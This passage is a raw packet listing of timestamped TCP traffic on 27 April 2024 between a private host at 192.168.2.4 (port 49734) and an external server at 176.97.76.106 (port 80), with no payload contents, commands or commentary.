Apr 27, 2024 00:46:06.820537090 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.820538044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.820578098 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.820765018 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.820804119 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.820808887 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.820839882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.820862055 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.820880890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.820940018 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.820977926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.820981026 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.821013927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.821014881 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.821050882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.821050882 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.821085930 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.821089029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.821121931 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.821125984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.821161032 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.821161985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.821198940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.821202040 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.821234941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.821235895 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.821266890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.821271896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.821306944 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.821307898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.821345091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.821346998 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.821379900 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.821381092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.821418047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.821420908 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.821455956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.821456909 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.821491003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.821491957 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.821521044 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.821530104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.821567059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.821568012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.821603060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.821605921 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.821639061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.821639061 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.821676970 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.821677923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.821715117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.821734905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.821751118 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.821749926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.821785927 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.821785927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.821822882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.821827888 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.821858883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.821863890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.821896076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.821902037 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.821933031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.821937084 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.821969032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.821974039 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.822001934 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.822005987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.822041035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.822046041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.822077990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.822082996 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.822113991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.822124004 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.822153091 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.822151899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.822187901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.822192907 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.822223902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.822225094 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.822261095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.822264910 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.822298050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.822299004 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.822333097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.822341919 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.822369099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.822372913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.822405100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.822407961 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.822443008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.822449923 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.822482109 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.822489023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.822530031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.822549105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.822566986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.822570086 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.822601080 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.822602034 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.822638035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.822642088 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.822674990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.822678089 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.822710037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.822710991 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.822746992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.822748899 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.822782993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.822787046 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.822818995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.822825909 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.822853088 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.822855949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.822894096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.822896957 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.822928905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.822932005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.822968006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.822971106 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.823003054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.823007107 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.823039055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.823054075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.823074102 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.823076010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.823100090 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.823116064 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.823116064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.823133945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.823134899 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.823149920 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.823151112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.823167086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.823168039 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.823180914 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.823184013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.823200941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.823203087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.823219061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.823230028 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.823242903 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.823261023 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.823297024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.823313951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.823329926 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.823331118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.823348999 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.823376894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.823394060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.823404074 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.823404074 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.823410988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.823426962 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.823445082 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.823457003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.823492050 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.823502064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.823534966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.823539972 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.823565960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.823570013 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.823595047 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.823611021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.823642969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.823646069 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.823674917 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.823725939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.823757887 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.823771954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.823788881 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.823807001 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.823820114 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.823860884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.823896885 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.823930025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.823960066 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.823961020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.823993921 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.824004889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.824023008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.824039936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.824053049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.824073076 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.824085951 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.824106932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.824126005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.824137926 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.824141979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.824157953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.824158907 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.824173927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.824178934 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.824189901 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.824192047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.824210882 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.824223042 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.824275970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.824292898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.824311018 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.824314117 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.824326038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.824327946 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.824340105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.824343920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.824359894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.824361086 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.824376106 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.824376106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.824393034 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.824395895 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.824409008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.824409962 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.824426889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.824429035 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.824443102 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.824457884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.824460983 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.824485064 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.824558020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.824574947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.824594021 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.824605942 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.824606895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.824637890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.824637890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.824683905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.824924946 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.824956894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.824961901 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.824987888 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.825001001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.825031996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.825033903 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.825047970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.825063944 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.825079918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.825083971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.825097084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.825114012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.825114012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.825131893 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.825149059 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.825170994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.825187922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.825202942 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.825221062 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.825257063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.825273991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.825294018 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.825305939 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.825345039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.825361967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.825381994 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.825393915 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.825409889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.825445890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.825447083 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.825476885 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.825479031 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.825494051 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.825510025 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.825510979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.825525999 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.825541973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.825562954 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.825623035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.825639009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.825642109 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.825655937 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.825659990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.825686932 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.825705051 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.825731993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.825753927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.825771093 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.825786114 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.825788975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.825807095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.825823069 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.825823069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.825838089 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.825839996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.825858116 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.825870037 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.825910091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.825927019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.825942993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.825943947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.825958967 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.825959921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.825975895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.825978994 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.825993061 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.826008081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.826010942 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.826025009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.826046944 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.826055050 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.826056004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.826092005 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.826124907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.826143026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.826159954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.826163054 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.826174974 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.826176882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.826195955 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.826201916 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.826272011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.826288939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.826303959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.826318979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.826323032 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.826368093 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.831593990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.831612110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.831645966 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.831654072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.831660032 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.831688881 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.831995964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.832026958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.832041979 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.832045078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.832062960 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.832082987 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.832740068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.832777977 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.834650993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.834687948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.834907055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.834939957 CEST	49734	80	192.168.2.4	176.97.76.106
